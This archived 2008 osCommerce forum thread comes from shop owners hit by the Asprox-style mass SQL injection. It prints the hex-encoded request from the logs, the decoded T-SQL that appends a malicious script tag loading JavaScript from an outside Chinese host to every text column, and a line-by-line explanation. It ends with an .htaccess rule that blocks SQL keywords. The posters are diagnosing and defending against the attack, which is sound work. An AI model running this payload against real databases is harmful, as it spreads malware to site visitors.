Maxwell Smart Posted August 16, 2008 Share Posted August 16, 2008 I found a rather strange URL in my logs today: /shop/?\';DeCLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228 3430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656 C65637420612E6E616D652C622E6E616D652066726F6D2073797 This was actually their landing page. Link to comment Share on other sites More sharing options...
Maxwell Smart Posted August 16, 2008 Author Share Posted August 16, 2008 Ok, so I've managed to figure out that's an SQL injection attack which translates to this: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="hXXp://sdo. 1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="hXXp: //sdo. 1000mg.cn/csrss/w.js"></script><!--''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor% AS% CHAR(@) Now obviously I'm going to want to check my db for changes but what would I be looking for? Link to comment Share on other sites More sharing options...
Maxwell Smart Posted August 16, 2008 Author Share Posted August 16, 2008 Apparently I should search Google before posting here... The following was taken from http://forum.joomla.org/viewtopic.php?f=43...375661#p1375966 this looks like MS SQL Server T-SQL and the tables it references don't exist in MySQL (which I assume is your back end database). DECLARE @T varchar(255),@C varchar(4000) --sets two variables to put your data in DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231or b.xtype=167) --sets up a cursor to read through all tables and all column names, i.e it retrieves tablename/columnname pairs for all the tables in your data OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C--opens cursor and starts reading the rows one at a time WHILE(@@FETCH_STATUS=0) BEGIN --loop handling exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="hXXp://sdo. 1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="hXXp: //sdo. 1000mg.cn/csrss/w.js"></script><!--''') --updates every column in every table to append a string to the existing data in the column. set ['+@C+']=['+@C+']+''"> pseudocode for this bit is "SET column_contents = column_contents plus something extra. The something extra looks like: "></title><script src="hXXp://sdo.1000mg.cn/csrss/w.js"></script><!--" (so everything after it will be commented out). He also avoids columns that he's already done. FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor% AS% CHAR(@) --get the next row and do it all again until loop is complete Link to comment Share on other sites More sharing options...
praxyp Posted September 5, 2008 Share Posted September 5, 2008 I found a rather strange URL in my logs today: /shop/?\';DeCLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228 3430303029204445434C415245205461626C655F437572736F7220435552534F5220464F52207365 6 C65637420612E6E616D652C622E6E616D652066726F6D2073797 This was actually their landing page. My site was also hacked. Images were not being displayed when I entered the "product_info.php". It turned-out someone had updated the "store name" parameter in the admin to include text similar to the one you have got there. Unfortunately I forgot to copy it before I reset the parameter. Let me know if you find any solution(s) to block this kind of intrusion. Link to comment Share on other sites More sharing options...
spooks Posted September 5, 2008 Share Posted September 5, 2008 http://www.oscommerce.com/forums/index.php?showtopic=313323 Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
Guest Posted September 6, 2008 Share Posted September 6, 2008 i got hammered by this 10 times over recently. adding this to .htaccess: RewriteCond %{QUERY_STRING} [^a-z](declare|char|set|cast|convert|delete|drop|exec|meta|script|select|truncate)[^a-z] [NC] RewriteRule (.*) - [F,L] should make it stop appearing in your logs... it'll give them a 500 error instead of a 404 or 200 response (once you serve these twits a proper error they tend to buzz off) Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.